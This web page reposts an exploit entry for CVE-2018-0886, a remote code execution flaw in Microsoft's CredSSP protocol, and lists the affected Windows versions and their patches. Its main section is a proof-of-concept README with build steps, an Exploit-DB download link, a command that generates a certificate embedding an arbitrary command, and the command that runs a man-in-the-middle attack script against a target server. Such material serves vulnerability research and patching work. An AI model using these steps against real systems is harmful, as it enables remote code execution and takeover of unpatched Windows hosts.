Microsoft CredSSP CVE-2018-0886 Remote Code Execution Exploit

Authors:Preempt               Risk:Critical

CVE:CVE-2018-0886            0day:Remote Code Execution

Exploit-id:Exploit-00886      Date:2018-04-14

Introduction

The Credential Security Support Provider protocol (CredSSP) in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and 1709 Windows Server 2016 and Windows Server, version 1709 allows a remote code execution vulnerability due to how CredSSP validates request during the authentication process, aka “CredSSP Remote Code Execution Vulnerability”.

Exploit

# credssp
 
This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay. 
 
 
Written by Eyal Karni, Preempt 
ekarni@preempt.com 
 
# Build
 
## Instructions (Linux)
If you are using Ubuntu 14 , check the install file.. 
It was tested on Ubuntu 16.04. 
 
```
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git 
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
```
 
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44453.zip
 
* It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography).  
* A different version of openssl needed to be installed for this to run successfully.  The install script does that. 
* Please follow the instructions in the described order. 
 
# Running the exploit 
 
 
Export a certificate suitable for Server Authentication from any domain.
 
 
To generate a suitable certificate for the command to execute : 
 
```
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD 
```
 
(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)
 
To run the attack script: 
 
```
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
```
 
More details are in the usage section of the scripts(--help).

Exploitability Assessment

The following table provides an exploitability assessment for this vulnerability at the time of original publication.

Publicly Disclosed Exploited Latest Software Release Older Software Release Denial of Service
No No 2 – Exploitation Less Likely 2 – Exploitation Less Likely Not Applicable

Affected Products

The following software versions or editions are affected. Versions or editions that are not listed are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, see the Microsoft Support Lifecycle.

Product
Platform
Article
Download
Impact
Severity
Supersedence
Windows 10 for 32-bit Systems 4088786 Security Update Remote Code Execution Important 4074596
Windows 10 for x64-based Systems 4088786 Security Update Remote Code Execution Important 4074596
Windows 10 Version 1511 for 32-bit Systems 4088779 Security Update Remote Code Execution Important 4074591
Windows 10 Version 1511 for x64-based Systems 4088779 Security Update Remote Code Execution Important 4074591
Windows 10 Version 1607 for 32-bit Systems 4088787 Security Update Remote Code Execution Important 4074590
Windows 10 Version 1607 for x64-based Systems 4088787 Security Update Remote Code Execution Important 4074590
Windows 10 Version 1703 for 32-bit Systems 4088782 Security Update Remote Code Execution Important 4074592
Windows 10 Version 1703 for x64-based Systems 4088782 Security Update Remote Code Execution Important 4074592
Windows 10 Version 1709 for 32-bit Systems 4088776 Security Update Remote Code Execution Important 4074588
Windows 10 Version 1709 for 64-based Systems 4088776 Security Update Remote Code Execution Important 4074588
Windows 7 for 32-bit Systems Service Pack 1 4088875 Monthly Rollup Remote Code Execution Important 4074598
4088878 Security Only
Windows 7 for x64-based Systems Service Pack 1 4088875 Monthly Rollup Remote Code Execution Important 4074598
4088878 Security Only
Windows 8.1 for 32-bit systems 4088876 Monthly Rollup Remote Code Execution Important 4074594
4088879 Security Only
Windows 8.1 for x64-based systems 4088876 Monthly Rollup Remote Code Execution Important 4074594
4088879 Security Only
Windows RT 8.1 4088876 Monthly Rollup  Remote Code Execution Important 4074594
Windows Server 2008 for 32-bit Systems Service Pack 2 4056564 Security Update Remote Code Execution Important 4056448
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) 4056564 Security Update Remote Code Execution Important 4056448
Windows Server 2008 for Itanium-Based Systems Service Pack 2 4056564 Security Update Remote Code Execution Important 4056448
Windows Server 2008 for x64-based Systems Service Pack 2 4056564 Security Update Remote Code Execution Important 4056448
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) 4056564 Security Update Remote Code Execution Important 4056448
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 4088875 Monthly Rollup Remote Code Execution Important 4074598
4088878 Security Only
Windows Server 2008 R2 for x64-based Systems Service Pack 1 4088875 Monthly Rollup Remote Code Execution Important 4074598
4088878 Security Only
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) 4088875 Monthly Rollup Remote Code Execution Important 4074598
4088878 Security Only
Windows Server 2012 4088877 Monthly Rollup Remote Code Execution Important 4074593
4088880 Security Only
Windows Server 2012 (Server Core installation) 4088877 Monthly Rollup Remote Code Execution Important 4074593
4088880 Security Only
Windows Server 2012 R2 4088876 Monthly Rollup Remote Code Execution Important 4074594
4088879 Security Only
Windows Server 2012 R2 (Server Core installation) 4088876 Monthly Rollup Remote Code Execution Important 4074594
4088879 Security Only
Windows Server 2016 4088787 Security Update Remote Code Execution Important 4074590
Windows Server 2016 (Server Core installation) 4088787 Security Update Remote Code Execution Important 4074590
Windows Server, version 1709 (Server Core Installation) 4088776 Security Update Remote Code Execution Important 4074588

Leave a Reply